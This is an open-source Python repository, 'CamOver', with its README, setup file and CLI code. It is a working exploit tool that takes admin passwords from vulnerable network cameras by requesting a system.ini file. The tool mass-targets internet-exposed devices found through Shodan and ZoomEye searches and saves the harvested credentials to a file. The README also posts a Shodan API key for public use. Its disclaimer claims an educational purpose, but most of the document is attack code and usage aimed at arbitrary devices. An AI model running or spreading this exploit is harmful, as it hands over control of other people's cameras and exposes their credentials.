├── TERMS_OF_SERVICE.md ├── LICENSE ├── camover ├── __init__.py ├── __main__.py └── cli.py ├── setup.py ├── CONTRIBUTING.md ├── .gitignore ├── README.md └── CODE_OF_CONDUCT.md /TERMS_OF_SERVICE.md: -------------------------------------------------------------------------------- 1 | # Terms of Service 2 | 3 | ## Our disclaimer 4 | 5 | This tool is designed for educational purposes only. 6 | 7 | Adequate defenses can only be built by researching attack techniques available to malicious actors. 8 | Using this tool against target systems without prior permission is illegal in most jurisdictions. 9 | The authors are not liable for any damages from misuse of this information or code. 10 | 11 | If you are planning on using this tool for malicious purposes that are not authorized by the company 12 | you are performing assessments for, you are violating the terms of service and license. 13 | 14 | After installing this tool, you automatically accept our terms of service and agree 15 | that you will use it only for lawful purposes. 16 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020-2024 EntySec 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /camover/__init__.py: -------------------------------------------------------------------------------- 1 | """ 2 | MIT License 3 | 4 | Copyright (c) 2020-2024 EntySec 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in all 14 | copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | SOFTWARE. 23 | """ 24 | 25 | from .__main__ import CamOver 26 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | """ 2 | MIT License 3 | 4 | Copyright (c) 2020-2024 EntySec 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in all 14 | copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | SOFTWARE. 23 | """ 24 | 25 | from setuptools import setup, find_packages 26 | 27 | setup(name='camover', 28 | version='1.0.0', 29 | description=( 30 | 'CamOver is a camera exploitation tool that allows to' 31 | ' disclosure network camera admin password.' 32 | ), 33 | url='https://github.com/EntySec/CamOver', 34 | author='EntySec', 35 | author_email='entysec@gmail.com', 36 | license='MIT', 37 | python_requires='>=3.7.0', 38 | packages=find_packages(), 39 | entry_points={ 40 | "console_scripts": [ 41 | "camover = camover.cli:main" 42 | ] 43 | }, 44 | install_requires=[ 45 | 'shodan', 46 | 'badges @ git+https://github.com/EntySec/Badges' 47 | ], 48 | zip_safe=False 49 | ) 50 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | ## Contributing 2 | 3 | [fork]: /fork 4 | 5 | [pr]: /compare 6 | 7 | [code-of-conduct]: CODE_OF_CONDUCT.md 8 | 9 | [templates]: templates 10 | 11 | Hi there! We're thrilled that you'd like to contribute to this project. Your help is essential for keeping it great. 12 | 13 | Please note that this project is released with a [Contributor Code of Conduct][code-of-conduct]. By participating in 14 | this project you agree to abide by its terms. 15 | 16 | ## Issues and PRs 17 | 18 | If you have suggestions for how this project could be improved, or want to report a bug, open an issue! We'd love all 19 | and any contributions. If you have questions, too, we'd love to hear them. 20 | 21 | We'd also love PRs. If you're thinking of a large PR, we advise opening up an issue first to talk about it, though! Look 22 | at the links below if you're not sure how to open a PR. 23 | 24 | ## Submitting a pull request 25 | 26 | 1. [Fork][fork] and clone the repository. 27 | 2. Create a new branch: `git checkout -b my-branch-name`. 28 | 3. Make your changes, fix bugs, add modules, plugins or commands and perform tests. 29 | 4. Push to your fork and [submit a pull request][pr]. 30 | 5. Pat your self on the back and wait for your pull request to be reviewed and merged. 31 | 32 | Here are a few things you can do that will increase the likelihood of your pull request being accepted: 33 | 34 | - Follow the standard of [templates][templates]. 35 | - Keep your changes as focused as possible. If there are multiple changes you would like to make that are not dependent 36 | upon each other, consider submitting them as separate pull requests. 37 | - Write a [good commit message](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html). 38 | 39 | Work in Progress pull requests are also welcome to get feedback early on, or if there is something blocked you. 40 | 41 | ## Resources 42 | 43 | - [How to Contribute to Open Source](https://opensource.guide/how-to-contribute/) 44 | - [Using Pull Requests](https://help.github.com/articles/about-pull-requests/) 45 | - [GitHub Help](https://help.github.com) 46 | -------------------------------------------------------------------------------- /camover/__main__.py: -------------------------------------------------------------------------------- 1 | """ 2 | MIT License 3 | 4 | Copyright (c) 2020-2024 EntySec 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in all 14 | copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | SOFTWARE. 23 | """ 24 | 25 | import re 26 | import requests 27 | 28 | 29 | class CamOver(object): 30 | """ Main class of camover module. 31 | 32 | This main class of camover module is intended for providing 33 | an exploit for network camera vulnerability that extracts credentials 34 | from the obtained system.ini file. 35 | """ 36 | 37 | @staticmethod 38 | def exploit(address: str) -> tuple: 39 | """ Exploit the vulnerability in network camera and extract credentials 40 | 41 | :param str address: device address 42 | :return tuple: tuple of username and password 43 | """ 44 | 45 | username = 'admin' 46 | 47 | try: 48 | response = requests.get( 49 | f"http://{address}/system.ini?loginuse&loginpas", 50 | verify=False, 51 | timeout=3 52 | ) 53 | except Exception: 54 | return 55 | 56 | if response.status_code == 200: 57 | strings = re.findall("[^\x00-\x1F\x7F-\xFF]{4,}", response.text) 58 | 59 | if username in strings: 60 | username_index = strings.index(username) 61 | password = strings[username_index + 1] 62 | 63 | return username, password 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CamOver 2 | 3 | [![Developer](https://img.shields.io/badge/developer-EntySec-blue.svg)](https://entysec.com) 4 | [![Language](https://img.shields.io/badge/language-Python-blue.svg)](https://github.com/EntySec/CamOver) 5 | [![Forks](https://img.shields.io/github/forks/EntySec/CamOver?style=flat&color=green)](https://github.com/EntySec/CamOver/forks) 6 | [![Stars](https://img.shields.io/github/stars/EntySec/CamOver?style=flat&color=yellow)](https://github.com/EntySec/CamOver/stargazers) 7 | [![CodeFactor](https://www.codefactor.io/repository/github/EntySec/CamOver/badge)](https://www.codefactor.io/repository/github/EntySec/CamOver) 8 | 9 | CamOver is a camera exploitation tool that allows to disclosure network camera admin password. 10 | 11 | ## Features 12 | 13 | * Exploits vulnerabilities in most popular camera models such as `CCTV`, `GoAhead` and `Netwave`. 14 | * Optimized to exploit multiple cameras at one time from list with threading enabled. 15 | * Simple CLI and API usage. 16 | 17 | ## Installation 18 | 19 | ```shell 20 | pip3 install git+https://github.com/EntySec/CamOver 21 | ``` 22 | 23 | ## Basic usage 24 | 25 | To use CamOver just type `camover` in your terminal. 26 | 27 | ``` 28 | usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] 29 | [--zoomeye ZOOMEYE] [-p PAGES] 30 | 31 | CamOver is a camera exploitation tool that allows to disclosure network camera 32 | admin password. 33 | 34 | optional arguments: 35 | -h, --help show this help message and exit 36 | -t, --threads Use threads for fastest work. 37 | -o OUTPUT, --output OUTPUT 38 | Output result to file. 39 | -i INPUT, --input INPUT 40 | Input file of addresses. 41 | -a ADDRESS, --address ADDRESS 42 | Single address. 43 | --shodan SHODAN Shodan API key for exploiting devices over Internet. 44 | --zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet. 45 | -p PAGES, --pages PAGES 46 | Number of pages you want to get from ZoomEye. 47 | ``` 48 | 49 | ### Examples 50 | 51 | **Exploiting single camera** 52 | 53 | Let's hack my camera just for fun. 54 | 55 | ```shell 56 | camover -a 192.168.99.100 57 | ``` 58 | 59 | **Exploiting cameras from Internet** 60 | 61 | Let's try to use Shodan search engine to exploit cameras over Internet, we will use it with `-t` for fast exploitation. 62 | 63 | ```shell 64 | camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD 65 | ``` 66 | 67 | **NOTE:** Given Shodan API key (`PSKINdQe1GyxGgecYz2191H2JoS9qvgD`) is my PRO API key, you can use this key or your own, 68 | be free to use all our resources for free :) 69 | 70 | **Exploiting cameras from input file** 71 | 72 | Let's try to use opened database of cameras with `-t` for fast exploitation. 73 | 74 | ```shell 75 | camover -t -i cameras.txt -o passwords.txt 76 | ``` 77 | 78 | **NOTE:** It will exploit all cameras in `cameras.txt` list by their addresses and save all obtained passwords 79 | to `passwords.txt`. 80 | 81 | ## API usage 82 | 83 | CamOver also has their own Python API that can be invoked by importing CamOver to your code. 84 | 85 | ```python 86 | from camover import CamOver 87 | ``` 88 | 89 | ### Basic functions 90 | 91 | There are all CamOver basic functions that can be used to exploit specified camera. 92 | 93 | * `exploit(address)` - Exploit single camera by given address. 94 | 95 | ### Examples 96 | 97 | **Exploiting single camera** 98 | 99 | ```python 100 | from camover import CamOver 101 | 102 | camover = CamOver() 103 | creds = camover.exploit('192.168.99.100') 104 | 105 | print(creds) 106 | ``` 107 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | entysec@gmail.com. 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 129 | -------------------------------------------------------------------------------- /camover/cli.py: -------------------------------------------------------------------------------- 1 | """ 2 | MIT License 3 | 4 | Copyright (c) 2020-2024 EntySec 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in all 14 | copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | SOFTWARE. 23 | """ 24 | 25 | import os 26 | import argparse 27 | import requests 28 | import threading 29 | 30 | from badges import Badges 31 | from shodan import Shodan 32 | 33 | from time import sleep as thread_delay 34 | 35 | from .__main__ import CamOver 36 | 37 | 38 | class CamOverCLI(CamOver, Badges): 39 | """ Subclass of camover module. 40 | 41 | This subclass of camover module is intended for providing 42 | command-line interface for CamOver. 43 | """ 44 | 45 | thread_delay = 0.1 46 | 47 | description = ( 48 | 'CamOver is a camera exploitation tool that allows to' 49 | ' disclosure network camera admin password.' 50 | ) 51 | 52 | parser = argparse.ArgumentParser(description=description) 53 | parser.add_argument('-t', '--threads', dest='threads', action='store_true', help='Use threads for fastest work.') 54 | parser.add_argument('-o', '--output', dest='output', help='Output result to file.') 55 | parser.add_argument('-i', '--input', dest='input', help='Input file of addresses.') 56 | parser.add_argument('-a', '--address', dest='address', help='Single address.') 57 | parser.add_argument('--shodan', dest='shodan', help='Shodan API key for exploiting devices over Internet.') 58 | parser.add_argument('--zoomeye', dest='zoomeye', help='ZoomEye API key for exploiting devices over Internet.') 59 | parser.add_argument('-p', '--pages', dest='pages', type=int, help='Number of pages you want to get from ZoomEye.') 60 | args = parser.parse_args() 61 | 62 | def thread(self, address: str) -> bool: 63 | """ Start new thread for the specified address. 64 | 65 | :param str address: device address 66 | :return bool: True if thread succeed 67 | """ 68 | 69 | result = self.exploit(address) 70 | 71 | if result: 72 | result = f"({address}) - {result[0]}:{result[1]}" 73 | if not self.args.output: 74 | self.print_success(result) 75 | else: 76 | with open(self.args.output, 'a') as f: 77 | f.write(f"{result}\n") 78 | return True 79 | return False 80 | 81 | def crack(self, addresses: list) -> None: 82 | """ Crack all devices from the specified list. 83 | 84 | :param list addresses: list of devices addresses 85 | :return None: None 86 | """ 87 | 88 | line = "/-\\|" 89 | 90 | counter = 0 91 | threads = list() 92 | for address in addresses: 93 | if counter >= len(line): 94 | counter = 0 95 | self.print_process(f"Exploiting... ({address}) {line[counter]}", end='') 96 | 97 | if not self.args.threads: 98 | self.thread(address) 99 | else: 100 | thread_delay(self.thread_delay) 101 | thread = threading.Thread(target=self.thread, args=[address]) 102 | 103 | thread.start() 104 | threads.append(thread) 105 | counter += 1 106 | 107 | counter = 0 108 | for thread in threads: 109 | if counter >= len(line): 110 | counter = 0 111 | self.print_process(f"Cleaning up... {line[counter]}", end='') 112 | 113 | if thread.is_alive(): 114 | thread.join() 115 | counter += 1 116 | 117 | def start(self) -> None: 118 | """ Main command-line arguments handler. 119 | 120 | :return None: None 121 | """ 122 | 123 | if self.args.output: 124 | directory = os.path.split(self.args.output)[0] 125 | 126 | if directory: 127 | if not os.path.isdir(directory): 128 | self.print_error(f"Directory: {directory}: does not exist!") 129 | return 130 | 131 | if self.args.zoomeye: 132 | self.print_process("Authorizing ZoomEye by given API key...") 133 | try: 134 | zoomeye = 'https://api.zoomeye.org/host/search?query=GoAhead 5ccc069c403ebaf9f0171e9517f40e41&page=' 135 | zoomeye_header = { 136 | 'Authorization': f'JWT {self.zoomeye}' 137 | } 138 | addresses = list() 139 | 140 | if self.args.pages: 141 | pages = int(self.args.pages) 142 | else: 143 | pages = 100 144 | pages, page = divmod(pages, 20) 145 | if page != 0: 146 | pages += 1 147 | 148 | for page in range(1, pages + 1): 149 | results = requests.get(zoomeye + str(page), headers=zoomeye_header).json() 150 | if not len(results['matches']): 151 | self.print_error("Failed to authorize ZoomEye!") 152 | return 153 | for address in results['matches']: 154 | addresses.append(address['ip'] + ':' + str(address['portinfo']['port'])) 155 | except Exception: 156 | self.print_error("Failed to authorize ZoomEye!") 157 | return 158 | self.crack(addresses) 159 | 160 | elif self.args.shodan: 161 | self.print_process("Authorizing Shodan by given API key...") 162 | try: 163 | shodan = Shodan(self.args.shodan) 164 | results = shodan.search(query='GoAhead 5ccc069c403ebaf9f0171e9517f40e41') 165 | addresses = list() 166 | for result in results['matches']: 167 | addresses.append(result['ip_str'] + ':' + str(result['port'])) 168 | except Exception: 169 | self.print_error("Failed to authorize Shodan!") 170 | return 171 | self.print_success("Authorization successfully completed!") 172 | self.crack(addresses) 173 | 174 | elif self.args.input: 175 | if not os.path.exists(self.args.input): 176 | self.print_error(f"Input file: {self.args.input}: does not exist!") 177 | return 178 | 179 | with open(self.args.input, 'r') as f: 180 | addresses = f.read().strip().split('\n') 181 | self.crack(addresses) 182 | 183 | elif self.args.address: 184 | self.print_process(f"Exploiting {self.args.address}...") 185 | if not self.thread(self.args.address): 186 | self.print_error(f"({self.args.address}) - is not vulnerable!") 187 | 188 | else: 189 | self.parser.print_help() 190 | return 191 | self.print_empty(end='') 192 | 193 | 194 | def main() -> None: 195 | """ CamOver command-line interface. 196 | 197 | :return None: None 198 | """ 199 | 200 | try: 201 | cli = CamOverCLI() 202 | cli.start() 203 | except BaseException: 204 | pass 205 | --------------------------------------------------------------------------------